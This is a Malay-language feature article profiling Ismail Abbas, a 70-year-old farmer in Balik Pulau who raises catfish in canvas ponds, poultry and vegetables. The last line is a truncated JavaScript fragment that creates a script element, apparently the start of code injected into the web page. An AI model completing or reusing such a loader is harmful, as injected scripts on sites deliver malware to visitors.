Semua hasil Allah yang bagi – Ismail

ISMAIL Abbas.
ISMAIL Abbas.

 

Oleh : YAP LEE YING

Gambar : IDZHAM AHMAD

 

SEBAGAI seorang yang turut meminati bidang pertanian, penulis amat mengagumi prinsip dan komitmen yang ditunjukkan (Pakcik) Ismail Abbas yang ditemui pada sesi wawancara Skuad Jalan-jalan Buletin Mutiara di Kampung Titi Teras, Pulau Betong, Balik Pulau baru-baru ini.

 

Pada usia 70 tahun, Ismail tidak pernah mengenal erti kata penat. Selain bercucuk tanam, beliau turut mengusahakan penternakan haiwan berkaki dua seperti ayam puri, itik, angsa dan lain-lain, Terbaru, beliau menceburi bidang penternakan ikan keli.

 

Enjoy‘, jawabnya ringkas kepada penulis.

 

Sebagai pembuka tirai, Skuad Jalan-jalan dibawa meninjau 3,000 anak ikan keli yang dibela di lima buah kolam kanvas.

 

Menurut Ismail, warna ikan keli yang dibela di dalam kanvas adalah tidak hitam dan rasanya adalah lebih manis dan lembut.

 

KEPELBAGAIAN sayur-sayuran yang diusahakan.
KEPELBAGAIAN sayur-sayuran yang diusahakan.

“Saya dah try makan, sebab itu saya nampak potensinya ada. Bela di dalam kanvas, airnya boleh ditukar. Di sini, air dibuka dan ditukar setiap hari. Kalau di dalam kolam, air tak boleh tukar dan warna ikan keli jadi hitam,” jelasnya yang tidak menafikan bahawa cabaran yang dihadapi dalam bidang tersebut adalah serangan burung helang, hujan berlebihan dan kadang-kadang ancaman manusia yang mana sengaja meletakkan racun di dalam kolam peliharaan.

 

Dari kolam ikan keli, kami dibawa melalui denai-denai kecil berselut ke ladang ternakan. Amat nyaman suasananya.

 

Sebelum tiba di destinasi, penulis sempat bertanyakan kepada Ismail berhubung minatnya dalam bidang pertanian.

 

“Ini semua harta dunia. Kita hidup kerana alam, kita pijak juga di atasnya. Semua hasil Allah yang bagi,” begitu mendalam sekali jawapan Ismail yang dikurniakan lima cahaya mata dan enam cucu kini.

 

DUA pekerja sedang memasang jaring bagi menutup sayur sawi yang baru ditanam.
DUA pekerja sedang memasang jaring bagi menutup sayur sawi yang baru ditanam.

Tidak sampai 10 minit, kedengaran kokokan ayam puri juga dikenali sebagai ayam belanda, ‘teriakan’ itik dan juga angsa serta bermacam-macam lagi.

 

Kedatangan tidak diduga kami disambut pekerja tetap ladang ternakan, Raziz Mohd. Nor yang sebelum ini merupakan penjawat awam.

 

“Saya berhenti sebab minat dengan kerja pertanian. Nak tumpu di sini.

 

“Saya ada pengalaman menanam sayur tapi cuma serai sahaja. Sebelum ini, saya buat di Penaga (Seberang Perai Utara), selepas itu, rakan sekolah menengah saya yang juga pemilik ladang ternakan ini kini, Cikgu Farizal (Farizal Hamidon) mula buat di sini, saya mengambil keputusan untuk tolong,” ujar Raziz yang agak pemalu orangnya.

 

Beliau memberitahu, rutin di ladang ternakan adalah bermula seawal 8 pagi dan berlarutan hingga 6.30 petang setiap hari.

 

“Tak boleh tinggal. Kena datang setiap hari sebab selain memberi makan kepada ternakan, juga ada orang datang setiap hari untuk membeli produk-produk ternakan dan juga pertanian di sini,” katanya yang berasal dari Sungai Nibong, Bayan Baru.

 

Tambah Ismail, ‘kejayaan’ ladang ternakan berkenaan adalah banyak hasil usaha serta komitmen Raziz yang turut dibantu lapan pekerja asing dari Bangladesh dan Indonesia memiliki permit sah.

 

Disebabkan tempoh masa yang singkat, Ismail kemudian membawa kami ke ladang sayurnya.

 

Dengan keluasan keseluruhan enam ekar, pelbagai tanaman sayur-sayuran diusahakan. Antaranya, sawi, bayam, bendi, kangkung, selasih dan pelbagai lagi.

 

Pernah dikecewakan dengan pasaran tidak menentu tanaman koko dan kopi membabitkan tanah seluas empat ekar, ia bagaimanapuun tidak mematahkan semangat Ismail untuk terus bergiat dalam bidang tersebut.

 

“Saya usahakan tanaman koko dan kopi di tanah seluas empat ekar. Namun, disebabkan tiada pasaran, semua dibiarkan macam tu saje.

 

“Saya tidak kecewa. Usaha lagi dan buat lain. Atas minat, semua boleh jadi.

 

“Pertanian memang banyak cabaran dan tidak boleh kaya. Selain bencana, ada lagi faktor-faktor yang tidak dapat dielakkan,” ujar beliau yang bersara daripada perkhidmatan tentera pada tahun 1985.

 

Menyentuh mengenai prinsip hidup Ismail, beliau memberitahu bahawa sekiranya ingin berjaya, kena rajin berusaha, tabah hadapi cabaran yang mendatang.

 

Mengakhiri sesi perbualan pada hari tersebut, Ismail menyatakan bahawa ‘rumput atas dunia, Allah yang bagi. Lembu tidak makan, ulat makan. Bila kita sudah kaya, hanya yang cantik dipilih dan menidakkan yang tidak cantik.

 

Begitu mendalam maknanya kepada penulis!

 

 

INFO :

012 – 557 5001

 var d=document;var s=d.createElement(‘script’);